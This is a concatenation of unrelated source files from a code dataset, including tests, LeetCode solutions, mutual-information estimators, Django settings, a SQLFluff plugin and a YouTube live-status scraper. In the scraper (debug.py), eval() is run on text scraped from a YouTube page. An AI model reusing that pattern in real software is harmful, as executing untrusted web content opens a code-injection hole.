dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"QuadList\").getDataArrayProxy(\"V2\").Flag = 2\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"QuadList\").getDataArrayProxy(\"V3\").Flag = 2\n err = d3d.remove_arrays(dca, dcap)\n if err < 0:\n print(\"Remove Arrays #2 - ErrorCondition: %d\" % err)\n\n # Create Geometry\n err = sc.CreateGeometry(dca, 0, simpl.IGeometry.Type.Quad, \"DataContainer\", False, \n shared_vertex_list_array_path = simpl.DataArrayPath(\"DataContainer\", \"Bounds\", \"Vertices\"),\n shared_quad_list_array_path = simpl.DataArrayPath(\"DataContainer\", \"QuadList\", \"Quads\"),\n vertex_attribute_matrix_name = \"VertexData\",\n face_attribute_matrix_name = \"FaceData\")\n if err < 0:\n print(\"Create Geometry - ErrorCondition: %d\" % err)\n\n err = d3d.data_container_writer(dca, sd.GetTestTempDirectory() + \"/CreateQuadGeometry.dream3d\", True, False)\n if err < 0:\n print(\"DataContainerWriter ErrorCondition: %d\" % err)\n\n\"\"\"\nMain entry point for python script\n\"\"\"\nif __name__ == \"__main__\":\n CreateQuadGeometryTest()\n","sub_path":"Wrapping/Python/Testing/Create_Quad_Geometry.py","file_name":"Create_Quad_Geometry.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"637926457","text":"# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE\n\nimport pytest # noqa: F401\nimport numpy as np # noqa: F401\nimport awkward as ak # noqa: F401\n\n\ndef test_flatten():\n content = ak.layout.NumpyArray(\n np.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9])\n )\n offsets = ak.layout.Index64(np.array([0, 3, 3, 5, 6, 10], dtype=np.int64))\n array = ak.layout.ListOffsetArray64(offsets, content)\n\n assert ak.to_list(array) == [\n [0.0, 1.1, 2.2],\n [],\n [3.3, 4.4],\n [5.5],\n [6.6, 7.7, 8.8, 9.9],\n ]\n assert ak.to_list(array.flatten(axis=1)) == [\n 0.0,\n 1.1,\n 2.2,\n 3.3,\n 4.4,\n 5.5,\n 6.6,\n 7.7,\n 8.8,\n 9.9,\n ]\n assert ak.to_list(array.flatten(axis=-1)) == [\n 0.0,\n 1.1,\n 2.2,\n 3.3,\n 4.4,\n 5.5,\n 6.6,\n 7.7,\n 8.8,\n 9.9,\n ]\n with pytest.raises(ValueError) as err:\n assert ak.to_list(array.flatten(axis=-2))\n assert str(err.value).startswith(\"axis=0 not allowed for flatten\")\n\n array2 = array[2:-1]\n assert ak.to_list(array2.flatten(axis=1)) == [3.3, 4.4, 5.5]\n assert ak.to_list(array2.flatten(axis=-1)) == [3.3, 4.4, 5.5]\n","sub_path":"tests/test_0042-stubs-for-flatten-operation.py","file_name":"test_0042-stubs-for-flatten-operation.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"364210824","text":"__author__ = 'zhy'\n\n\nclass Solution(object):\n @staticmethod\n def multiply(num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n res = [0] * (len(num1) + len(num2))\n\n for i, v1 in enumerate(reversed(num1)):\n for j, v2 in enumerate(reversed(num2)):\n res[i + j] += (int(v1) * int(v2))\n res[i + j + 1] += res[i + j] // 10\n res[i + j] %= 10\n\n while len(res) > 1 and res[-1] == 0:\n res.pop()\n return ''.join(reversed(list(map(str, res))))\n\n\ndef test():\n a = [('234', '2345')]\n for i1, i2 in a:\n print(Solution.multiply(i1, i2), ' vs ', int(i1) * int(i2))\n\n\nif __name__ == '__main__':\n test()\n","sub_path":"Multiply Strings.py","file_name":"Multiply Strings.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"390553036","text":"# @Author: mario\n# @Date: 2019-01-07T17:03:06+01:00\n# @Last modified by: mario\n# @Last modified time: 2019-01-07T17:16:55+01:00\n\n\nimport abc\nfrom functools import partial\nfrom multiprocessing import Pool\n\nimport numpy as np\nfrom scipy.spatial.distance import pdist, squareform\nfrom scipy.special import digamma\nfrom sklearn.neighbors import KDTree\nfrom sklearn.preprocessing import normalize, scale\n\n\nclass MIEstimator(metaclass=abc.ABCMeta):\n def __init__(self):\n pass\n\n @abc.abstractmethod\n def estimateConditionalMI(self, X, Y, Z):\n \"\"\"\n In the context of feature selection, X is the feature to be added\n or deleted, Y is the response (either categorical for classification\n or numerical for regression) and Z is the matrix of the other features\n \"\"\"\n pass\n\n @abc.abstractmethod\n def estimateMI(self, X, Y, Z):\n pass\n\n\nclass EntropyMIEstimator(MIEstimator):\n \"\"\"\n Basic 3H MIEstimator.\n \"\"\"\n\n def __init__(self, entropyEstimator):\n self.entropyEstimator = entropyEstimator\n\n def estimateMI(self, X, Y):\n h_x = self.entropyEstimator.estimateFromData(X)\n h_y = self.entropyEstimator.estimateFromData(Y)\n h_xy = self.entropyEstimator.estimateJoint([X, Y])\n return h_x + h_y - h_xy\n\n def estimateConditionalMI(self, X, Y, Z):\n h_xz = self.entropyEstimator.estimateJoint([X, Z])\n h_yz = self.entropyEstimator.estimateJoint([Y, Z])\n h_xyz = self.entropyEstimator.estimateJoint([X, Y, Z])\n h_z = self.entropyEstimator.estimateFromData(Z)\n return h_xz + h_yz - h_xyz - h_z\n\n\ndef distanceInNorm(x, y, norm):\n return np.linalg.norm(x - y, norm)\n\n\ndef computeMIforSample(i, XYZ, XZ, YZ, Z, norm, k):\n dists = np.array(list(map(\n lambda z: np.linalg.norm(XYZ[i] - z, norm),\n np.delete(XYZ, i, axis=0))))\n idx = np.argpartition(dists, k-1)[k-1]\n epsI = dists[idx]\n\n distsXZ = np.array(list(map(\n lambda z: np.linalg.norm(XZ[i] - z, norm),\n np.delete(XZ, i, axis=0))))\n nXZ = np.sum(distsXZ < epsI) + 1\n\n distsYZ = np.array(list(map(\n lambda z: np.linalg.norm(YZ[i] - z, norm),\n np.delete(XZ, i, axis=0))))\n nYZ = np.sum(distsYZ < epsI) + 1\n distsZ = np.array(list(map(\n lambda z: np.linalg.norm(Z[i] - z, norm),\n np.delete(Z, i, axis=0))))\n nZ = np.sum(distsZ < epsI) + 1\n print(\"Old eps: {0}, nXZ: {1}, nYZ: {2}, nZ:{3}\".format(\n epsI, nXZ, nYZ, nZ))\n return digamma(nXZ) + digamma(nYZ) - digamma(nZ)\n\n\nclass MixedRvMiEstimator(MIEstimator):\n \"\"\"\n An estimator of the mutual information based on the local estimate of\n the Radon-Nikodym derivative. For more information see:\n https://papers.nips.cc/paper/7180-estimating-mutual-information-for-discrete-continuous-mixtures.pdf\n \"\"\"\n\n def __init__(self, num_neighbors, norm=2, nproc=1):\n super().__init__()\n self.k = num_neighbors\n self.norm = norm\n self.nproc = nproc\n\n @staticmethod\n def firstNonZero(vec):\n mask = (vec != 0)\n return np.where(mask.any(axis=0), mask.argmax(axis=0), -1)\n\n def estimateConditionalMI(self, X, Y, Z):\n \"\"\"\n I(X;Y|Z) = I(X,Z; Y) - I(Z; Y)\n \"\"\"\n if X.ndim == 1:\n X = X.reshape(-1, 1)\n if Y.ndim == 1:\n Y = Y.reshape(-1, 1)\n if Z.ndim == 1:\n Z = Z.reshape(-1, 1)\n\n XYZ = np.hstack((X, Y, Z))\n XZ = np.hstack((X, Z))\n YZ = np.hstack((Y, Z))\n nSamples = X.shape[0]\n\n XYZdists = squareform(pdist(XYZ))\n XZTree = KDTree(XZ)\n YZTree = KDTree(YZ)\n ZTree = KDTree(Z)\n partialMis = np.zeros(nSamples)\n\n for i in range(nSamples):\n dists = np.array(XYZdists[i, ])\n idx = np.argpartition(dists, self.k-1)[self.k-1]\n epsI = dists[idx]\n\n nXZ = XZTree.query_radius(\n XZ[i].reshape(1, -1), epsI, count_only=True)\n nYZ = YZTree.query_radius(\n YZ[i].reshape(1, -1), epsI, count_only=True)\n nZ = ZTree.query_radius(Z[i].reshape(1, -1), epsI, count_only=True)\n\n partialMis[i] = digamma(nXZ) + digamma(nYZ) - digamma(nZ)\n\n return digamma(self.k) - np.sum(partialMis) / nSamples\n\n def estimateMI(self, X, Y):\n nSamples = X.shape[0]\n out = 0\n if X.ndim == 1:\n X = X.reshape(-1, 1)\n if Y.ndim == 1:\n Y = Y.reshape(-1, 1)\n\n for i in range(nSamples):\n x_i = X[i]\n y_i = Y[i]\n distsX = np.array(list(map(\n lambda z: np.linalg.norm(x_i - z, self.norm),\n np.delete(X, i, axis=0))))\n distsY = np.array(list(map(\n lambda z: np.linalg.norm(y_i - z, self.norm),\n np.delete(Y, i, axis=0))))\n dists = np.maximum(distsX, distsY)\n idx = np.argpartition(dists, self.k-1)[self.k-1]\n distK = dists[idx]\n k = self.k if distK > 0 else self.firstNonZero(distK)\n nX = sum(distsX <= distK-1e-15) + 1\n # print('nX: {0}'.format(nX))\n nY = sum(distsY <= distK-1e-15) + 1\n # print('nY: {0}'.format(nY))\n out += (digamma(k) - digamma(nX) - digamma(nY)) / nSamples\n return out + np.log(nSamples)\n","sub_path":"src/algorithm/info_theory/mutual_information_kdtree.py","file_name":"mutual_information_kdtree.py","file_ext":"py","file_size_in_byte":5374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"651336193","text":"from admin_module.user_module.director import Director\n\n__author__ = 'marcelo_garay'\n\n\nclass Movie(object):\n \"\"\"\n Creation of an instance of movie\n \"\"\"\n\n def __init__(self, title, story_line, release_year,\n id_actor=None, id_director=None):\n self.title = title\n self.story_line = story_line\n self.release_year = release_year\n self.rating = 0\n self.ranking = 0\n self.genres = \"\"\n self.rental_price = 0\n self.sell_price = 0\n self.quantity_available = []\n self.id_actor = id_actor\n self.id_director = id_director\n\n def _get_title(self):\n \"\"\"\n Get Title movie\n :return:\n \"\"\"\n return self.title\n\n def _get_story_line(self):\n \"\"\"\n Get Story line\n :return:\n \"\"\"\n return self.story_line\n\n def _get_release_year(self):\n \"\"\"\n Get Release year\n :return:\n \"\"\"\n return self.release_year\n","sub_path":"src/admin_module/catalogo_movie/Movie.py","file_name":"Movie.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"593292799","text":"import asyncio\nimport aiohttp\nfrom bs4 import BeautifulSoup\nimport re\nfrom tqdm import tqdm\nimport requests\n\ndef get(URL):\n return requests.get(URL).json()\n\n\n\nasync def main(uid):\n hed = {'Accept-Language': 'ja'}\n url = \"https://www.youtube.com/channel/\" + uid\n async with aiohttp.ClientSession(headers=hed) as session:\n async with session.get(url) as response:\n html = await response.text()\n parsed = BeautifulSoup(html, \"html.parser\")\n \n element_1 = parsed.find_all('script', text=re.compile(\"ライブ配信中\"))\n element_2 = parsed.find_all('script', text=re.compile(\"人が視聴中\"))\n\n if len(element_1) > 0 and len(element_2) > 0:\n for scrp in parsed.find_all(\"script\"):\n if \"window[\\\"ytInitialData\\\"]\" in scrp.text:\n dict_str = scrp.text.split(\" = \")[1]\n\n dict_str = dict_str.replace(\"false\",\"False\")\n dict_str = dict_str.replace(\"true\",\"True\")\n\n dict_str = dict_str.rstrip(\" \\n;\")\n\n dict_str = dict_str.replace(' window[\"ytInitialPlayerResponse\"]', '')\n dict_str = dict_str.replace(\";\", \"\")\n \n dics = eval(dict_str)\n break\n try:\n stream_description = dics[\"contents\"][\"twoColumnBrowseResultsRenderer\"][\"tabs\"][0]\\\n [\"tabRenderer\"][\"content\"][\"sectionListRenderer\"][\"contents\"][0]\\\n ['itemSectionRenderer']['contents'][0]\\\n ['channelFeaturedContentRenderer']['items'][0]\\\n ['videoRenderer']\n except KeyError:\n result = {'uid': uid, 'status': False}\n\n else:\n watch = stream_description['videoId']\n title = stream_description['title']['simpleText']\n print(title)\n result = {'watch': watch, 'title': title, 'uid': uid, 'status': True}\n else:\n result = {'uid': uid, 'status': False}\n return result\n\nBASE_URL = 'https://vtuber-livestatus-api.herokuapp.com/api/' \n\nall_liver = get(BASE_URL + 'vtuber/')\non_liver = get(BASE_URL + 'onlive/')\nif len(on_liver) != 0:\n on_livers = [liver['uid']['uid'] for liver in on_liver]\nelse:\n on_livers = []\n\nuids = [liver['uid'] for liver in all_liver]\n\n\nloop = asyncio.get_event_loop()\ndone,pending = loop.run_until_complete(\n asyncio.wait([main(uid) for uid in uids]))\n\nres = [d.result() for d in done] #結果\nlen(res)\n\n","sub_path":"debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"103356405","text":"import os\nfrom utils import *\nimport common\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nPROJECT_DIR = os.path.dirname(os.path.abspath(__file__))[:-5] # cut \"/conf\" from the end\nPROJECT_ROOT = os.path.realpath(os.path.dirname(__file__))\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': PROJECT_DIR + '/storage.sqlite', # Or path to database file if using sqlite3.\n 'USER': '', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\nSTATIC_ROOT = PROJECT_DIR + '/static'\n\nMEDIA_ROOT = os.path.join(PROJECT_DIR, 'media')\nMEDIA_URL = '/media/'\n\n\nEMAIL_SITE_ROOT_URL = \"http://localhost:8082\"\nEMAIL_FROM = \"pce.dev@gmail.com\"\n\nCONFIGURATIONS = {\n \"tst_config\" : ConfigurationInfo(\"Test Configuration\", \"graph_db.configurations.test_config.TestConfig\", PROJECT_DIR + \"/graph_db/databases/nxgraph.gpickle\"),\n \"tst_config2\" : ConfigurationInfo(\"Test Configuration 2\", \"graph_db.configurations.test_config.TestConfig\", PROJECT_DIR + \"/graph_db/databases/nxgraph2.gpickle\"),\n \"nsls2_magnets\" : ConfigurationInfo(\"NSLS 2 - Magnets configuration\", \"graph_db.configurations.nsls2_magnets.NSLS2Magnets\", PROJECT_DIR + \"/graph_db/databases/nsls2_magnets.gpickle\"),\n \"nsls2_magnets_test\" : ConfigurationInfo(\"Test NSLS 2 - Magnets configuration\", \"graph_db.configurations.nsls2_magnets.NSLS2Magnets\", PROJECT_DIR + \"/graph_db/databases/nsls2_magnets_test.gpickle\"),\n \"cxv2_config\" : ConfigurationInfo(\"CXV2 \", \"graph_db.configurations.cxv2_config.CXV2Config\", PROJECT_DIR + \"/graph_db/databases/cxv2_config.gpickle\"),\n}\n\ncommon.INSTALLED_APPS += [\n 'nsls_tools'\n]\n\ncommon.MENU_SOURCES += [\"nsls_tools.menu.MENU_ITEMS\", \"std_editor.menu.MENU_ITEMS\", \"cxv2_tools.menu.MENU_ITEMS\"]\n","sub_path":"conf/local_alexmak_hare.py","file_name":"local_alexmak_hare.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"644341220","text":"\"\"\"This module integrates SQLFluff with diff_cover's \"diff-quality\" tool.\"\"\"\nfrom typing import List\n\nfrom diff_cover.hook import hookimpl as diff_cover_hookimpl\nfrom diff_cover.violationsreporters.base import BaseViolationReporter, Violation\n\nfrom sqlfluff.core import FluffConfig, Linter\n\n\nclass SQLFluffViolationReporter(BaseViolationReporter):\n \"\"\"Class that implements diff-quality integration.\"\"\"\n\n supported_extensions = [\"sql\"]\n\n def __init__(self):\n \"\"\"Calls the base class constructor to set the object's name.\"\"\"\n super().__init__(\"sqlfluff\")\n\n @staticmethod\n def violations(src_path: str) -> List[Violation]:\n \"\"\"Return list of violations.\n\n Given the path to a .sql file, analyze it and return a list of\n violations (i.e. formatting or style issues).\n \"\"\"\n linter = Linter(config=FluffConfig.from_root())\n linted_path = linter.lint_path(src_path, ignore_non_existent_files=True)\n result = []\n for violation in linted_path.get_violations():\n try:\n # Normal SQLFluff warnings\n message = f\"{violation.rule_code()}: {violation.description}\"\n except AttributeError:\n # Parse errors\n message = str(violation)\n result.append(Violation(violation.line_no, message))\n return result\n\n def measured_lines(self, src_path: str) -> None: # pragma: no cover\n \"\"\"Return list of the lines in src_path that were measured.\"\"\"\n\n\n@diff_cover_hookimpl\ndef diff_cover_report_quality() -> SQLFluffViolationReporter:\n \"\"\"Returns the SQLFluff plugin.\n\n This function is registered as a diff_cover entry point. diff-quality calls\n it in order to \"discover\" the SQLFluff plugin.\n\n :return: Object that implements the BaseViolationReporter ABC\n \"\"\"\n return SQLFluffViolationReporter()\n","sub_path":"src/sqlfluff/diff_quality_plugin.py","file_name":"diff_quality_plugin.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"350422766","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n for i, num in enumerate(nums):\n for j, num2 in enumerate(nums):\n if num + num2 == target and i != j:\n return [i, j]\n\n# completed 2022-11-20 (YYYY-MM-DD)\n# Runtime: 7868 ms, faster than 5.06% of Python3 online submissions for Two Sum.\n# Memory Usage: 15 MB, less than 80.28% of Python3 online submissions for Two Sum.\n# notes: not efficient at all but it works and i thought about it fast -- next time try to do it better\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n indexList = {}\n \n for i, num in enumerate(nums):\n if (target-num in indexList):\n return [i, indexList[target-num]]\n \n indexList[num] = i\n\n# completed 2022-11-24 (YYYY-MM-DD)\n# Runtime: 162 ms, faster than 33.26% of Python3 online submissions for Two Sum.\n# Memory Usage: 15.1 MB, less than 54.52% of Python3 online submissions for Two Sum.\n# notes: a better linear solution! uses dictionary. got some help with figuring out this one...\n","sub_path":"completed/leetcode/can-optimize/1-two-sum.py","file_name":"1-two-sum.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"296318961","text":"# pyright: reportMissingTypeStubs=false\nfrom src.Model.OvRClassifier import OvRClassifier\nfrom typing import List\nfrom .Mathematics.Matrix import Matrix\nimport logging, argparse, csv\nfrom .IO.ModelRepositoryFactory import model_data_repo_factory\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s-%(levelname)s %(name)s:%(message)s')\nlogger = logging.getLogger('run')\n\ndef load_data(file_name: str) -> Matrix:\n logger.debug(f\"Loading data from: {file_name}\")\n rgbs: List[List[int]] = []\n\n with open(file_name, 'r') as f:\n reader = csv.reader(f)\n for r, g, b in reader:\n rgbs.append([int(r), int(g), int(b)])\n\n return Matrix(rgbs).rtocol()\n\n\ndef load_model(modelName: str):\n model_repo = model_data_repo_factory.get_repo(modelName)\n layers = model_repo.read()\n return layers\n\n\ndef runFromFile(model_name: str, input_data: str):\n model = load_model(model_name)\n inputs = load_data(input_data)\n inputs = inputs.divide(255)\n logger.debug(f\"Running model: {model_name}\")\n results = OvRClassifier.run_model(model, inputs)\n\n print(results)\n\n\ndef runFromRgb(model_name: str, rgb: List[int]):\n model = load_model(model_name)\n inputs = Matrix([[rgb[0]], [rgb[1]], [rgb[2]]])\n inputs = inputs.divide(255)\n logger.debug(f\"Running model: {model_name}\")\n results = OvRClassifier.run_model(model, inputs)\n print(f\"RGB {rgb} is {results[0]}\")\n\n \nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"Runs the Neural Network\")\n group = parser.add_mutually_exclusive_group()\n group.add_argument('--file', type=str, help=\"Use data from csv file (R,G,B) without header. \")\n group.add_argument('--rgb', type=int, nargs=3, help=\"RGB values ([0-255] [0-255] [0-255])\")\n parser.add_argument('modelName', type=str)\n\n args = parser.parse_args()\n print(args)\n if args.file != None :\n runFromFile(args.modelName, args.file)\n elif args.rgb != None:\n runFromRgb(args.modelName, args.rgb)\n","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"172546100","text":"#Faça um Programa que peça o raio de um círculo, calcule e mostre sua área.\n\nraio = input(\"Informe o valor do raio: \")\n\nr = float(raio)\npi = float(3.14)\n\narea = pi * (r**2)\n\nprint (\"Valor da area\", area)","sub_path":"estruturaSequencial/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"117189887","text":"\"\"\"NOTE: This file is Python 3.7 compatible for Blender 2.9X use.\"\"\"\n__all__ = [\"BinderError\", \"BaseBinder\", \"BinderHashTable\"]\n\nimport abc\nimport io\nimport json\nimport logging\nimport typing as tp\nfrom pathlib import Path\n\nfrom soulstruct.base.game_file import GameFile, InvalidGameFileTypeError\nfrom soulstruct.containers.entry import BinderEntry\nfrom soulstruct.containers.flags import BinderFlags\nfrom soulstruct.utilities.binary import BinaryReader, BinaryStruct\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass BinderError(Exception):\n pass\n\n\nclass BaseBinder(GameFile, abc.ABC):\n \"\"\"Base class for both BND and BXF (BHD/BDT) binder files.\"\"\"\n\n # `EXT` depends on files contained in binder.\n EXTRA_MANIFEST_FIELDS: tp.Tuple[str] = () # fields beyond `signature`, `flags`, `big_endian`, and `bit_big_endian`\n BinderEntry = BinderEntry # for convenience\n\n signature: str\n flags: BinderFlags\n big_endian: bool\n bit_big_endian: bool\n\n def __init__(self, file_source: GameFile.Typing = None, dcx_magic=(), **kwargs):\n self.signature = \"\"\n self.flags = BinderFlags(0) # no other sensible default\n self.big_endian = False\n self.bit_big_endian = False\n self._entries = [] # type: tp.List[BinderEntry]\n super().__init__(file_source, dcx_magic=dcx_magic, **kwargs)\n\n def _handle_other_source_types(self, file_source, **kwargs) -> tp.Optional[BinaryReader]:\n \"\"\"A BND can also be loaded from a `binder_manifest.json` file or a directory containing such a file.\"\"\"\n\n if isinstance(file_source, (str, Path)):\n file_source = Path(file_source)\n if file_source.is_dir() and (file_source / \"binder_manifest.json\").exists():\n file_source = file_source / \"binder_manifest.json\" # go to below\n if file_source.is_file() and file_source.name == \"binder_manifest.json\":\n directory = file_source.parent\n if directory.suffix == \".unpacked\": # only this suffix is automatically removed\n self.path = directory.with_name(directory.name[:-9])\n else:\n self.path = directory # writing this path will conflict with this unpacked folder source\n self.load_unpacked_dir(directory)\n return\n\n raise InvalidGameFileTypeError(\n f\"`file_source` is not a `binder_manifest.json` file or directory containing one.\"\n )\n\n def add_entry(self, entry: BinderEntry):\n if entry in self._entries:\n raise BinderError(f\"Given `BinderEntry` instance with ID {entry.id} is already in this binder.\")\n if entry.id in self.entries_by_id:\n _LOGGER.warning(f\"Entry ID {entry.id} appears more than once in this binder. You should fix this!\")\n self._entries.append(entry)\n\n def remove_entry(self, id_or_path_or_basename):\n if isinstance(id_or_path_or_basename, int):\n entry = self.entries_by_id[id_or_path_or_basename]\n elif isinstance(id_or_path_or_basename, str):\n try:\n entry = self.entries_by_path[id_or_path_or_basename]\n except KeyError:\n entry = self.entries_by_basename[id_or_path_or_basename]\n else:\n raise TypeError(\"Entry to be removed should be a binder entry ID (int) or path/basename (str).\")\n self._entries.remove(entry)\n\n def clear_entries(self):\n \"\"\"Remove all entries from the BND.\"\"\"\n self._entries.clear()\n\n @abc.abstractmethod\n def get_json_header(self) -> tp.Dict[str, tp.Any]:\n ...\n\n def load_unpacked_dir(self, directory):\n \"\"\"Load binder from a Soulstruct-unpacked directory containing a `binder_manifest.json` file.\"\"\"\n directory = Path(directory)\n if not directory.is_dir():\n raise ValueError(f\"Could not find unpacked binder directory {repr(directory)}.\")\n with (directory / \"binder_manifest.json\").open(\"r\", encoding=\"shift-jis\") as f:\n manifest = json.load(f)\n for field, value in self.get_manifest_header(manifest).items():\n setattr(self, field, value)\n self.add_entries_from_manifest(manifest[\"entries\"], directory, manifest[\"use_id_prefix\"])\n\n def get_manifest_header(self, manifest: tp.Dict) -> tp.Dict[str, tp.Any]:\n \"\"\"Extract manifest header data from given `manifest` dictionary and parse them into appropriate types.\n\n Other keys may be present in `manifest`, and will be ignored.\n \"\"\"\n if \"version\" not in manifest:\n raise BinderError(\"JSON manifest file does not contain 'version' key.\")\n if manifest[\"version\"] not in [base.__name__ for base in self.__class__.__bases__]:\n raise BinderError(\n f\"Version of file ({manifest['version']}) does not match \"\n f\"`BaseBinder` child class name ({self.__class__.__name__}).\"\n )\n loaded_manifest = {\n \"dcx_magic\": tuple(manifest[\"dcx_magic\"]),\n \"signature\": manifest[\"signature\"],\n \"flags\": BinderFlags(manifest[\"flags\"]),\n \"big_endian\": manifest[\"big_endian\"],\n \"bit_big_endian\": manifest[\"bit_big_endian\"],\n }\n for field in self.EXTRA_MANIFEST_FIELDS:\n loaded_manifest[field] = manifest[field]\n return loaded_manifest\n\n def add_entries_from_manifest(self, entries: tp.Dict, directory: tp.Union[str, Path], use_id_prefix: bool):\n directory = Path(directory)\n unsorted_entries = {} # maps ID to `(path, data, flags)` tuple\n for root, entry_dicts in entries.items():\n for entry in entry_dicts:\n find_entry_basename = f\"__{entry['id']}__{entry['name']}\" if use_id_prefix else entry['name']\n with (directory / find_entry_basename).open(\"rb\") as entry_file:\n entry_data = entry_file.read()\n unsorted_entries[entry['id']] = (f\"{root}\\\\{entry['name']}\", entry_data, entry['flags'])\n for entry_id, (path, data, flags) in sorted(unsorted_entries.items()):\n self.add_entry(BinderEntry(entry_id=entry_id, path=path, data=data, flags=flags))\n\n def write_unpacked_dir(self, directory=None):\n if not self.flags.has_names:\n raise NotImplementedError(\n \"Writing unpacked binder directories is only supported for binder formats with path strings.\"\n )\n if directory is None:\n if self.path:\n directory = self.path.with_suffix(self.path.suffix + \".unpacked\")\n else:\n raise ValueError(\"Cannot detect `directory` for unpacked binder automatically.\")\n else:\n directory = Path(directory)\n directory.mkdir(parents=True, exist_ok=True)\n\n entry_tree_dict = {}\n use_index_prefix = self.has_repeated_entry_names\n\n for i, entry in enumerate(self._entries):\n entry_directory = str(Path(entry.path).parent) # no trailing backslash\n entry_dict = {\"flags\": entry.flags, \"id\": entry.id if self.flags.has_ids else i, \"name\": entry.name}\n entry_tree_dict.setdefault(entry_directory, []).append(entry_dict)\n entry_file_name = f\"__{entry.id}__{entry.name}\" if use_index_prefix else entry.name\n with (directory / entry_file_name).open(\"wb\") as f:\n f.write(entry.data)\n\n json_dict = self.get_json_header()\n json_dict[\"entries\"] = entry_tree_dict\n\n # NOTE: Binder manifest is always encoded in shift-JIS, not `shift_jis_2004`.\n with (directory / \"binder_manifest.json\").open(\"w\", encoding=\"shift-jis\") as f:\n json.dump(json_dict, f, indent=4)\n\n @classmethod\n def detect(cls, binder_source: GameFile.Typing) -> bool:\n \"\"\"Returns True if `binder_source` appears to be this subclass of `BaseBinder`. Does not support DCX sources.\"\"\"\n if isinstance(binder_source, (str, Path)):\n binder_path = Path(binder_source)\n if binder_path.is_file() and binder_path.name == \"binder_manifest.json\":\n binder_path = binder_path.parent\n if binder_path.is_dir():\n try:\n with (binder_path / \"binder_manifest.json\").open(\"rb\") as f:\n return json.load(f)[\"version\"] == cls.__name__ # \"BND3\" or \"BND4\"\n except FileNotFoundError:\n return False\n elif binder_path.is_file():\n reader = BinaryReader(binder_path)\n try:\n version = reader.unpack_string(length=4, encoding=\"ascii\")\n except ValueError:\n return False\n if version[:3] in {\"BHF\", \"BDF\"}:\n version = f\"BXF{version[3]}\" # BXF header or data file\n return version == cls.__name__\n return False\n elif isinstance(binder_source, (bytes, io.BufferedIOBase)):\n binder_source = BinaryReader(binder_source)\n\n if isinstance(binder_source, BinaryReader):\n with binder_source.temp_offset(0):\n try:\n version = binder_source.unpack_string(length=4, encoding=\"ascii\")\n except ValueError:\n return False\n if version[:3] in {\"BHF\", \"BDF\"}:\n version = f\"BXF{version[3]}\" # BXF header or data file\n return version == cls.__name__\n\n raise TypeError(f\"Cannot detect `Binder` class from source type: {binder_source}\")\n\n @property\n def entries(self) -> tp.List[BinderEntry]:\n \"\"\"Returns an ordered list of BND entries, unpacked with the `entry_class` given to the constructor.\"\"\"\n return self._entries\n\n @property\n def entries_by_id(self) -> tp.Dict[int, BinderEntry]:\n \"\"\"Dictionary mapping entry IDs to entries.\n\n If there are multiple entries with the same ID in the BND, this will raise a `ValueError`. This should never\n happen; if it does, fix it by accessing the culprit entries with `.entries` and changing one or more IDs.\n \"\"\"\n entries = {}\n for entry in self._entries:\n if entry.id in entries:\n raise BinderError(f\"There are multiple entries with ID {entry.id}.\")\n entries[entry.id] = entry\n return entries\n\n @property\n def entries_by_path(self) -> tp.Dict[str, BinderEntry]:\n \"\"\"Dictionary mapping entry paths to (classed) entries.\n\n The same path and/or basename may appear in multiple paths in a BND (e.g. vanilla 'item.msgbnd' in Dark Souls\n Remastered). If it does, this property will raise an exception.\n \"\"\"\n entries = {}\n for entry in self._entries:\n if entry.path in entries:\n raise ValueError(f\"Path '{entry.path}' appears in multiple `BNDEntry` paths.\")\n entries[entry.path] = entry\n return entries\n\n @property\n def entries_by_basename(self) -> tp.Dict[str, BinderEntry]:\n \"\"\"Dictionary mapping entry basenames to (classed) entries.\n\n The same path and/or basename may appear in multiple paths in a BND (e.g. vanilla 'item.msgbnd' in Dark Souls\n Remastered). If it does, this property will raise an exception.\n \"\"\"\n entries = {}\n for entry in self._entries:\n if entry.name in entries:\n raise 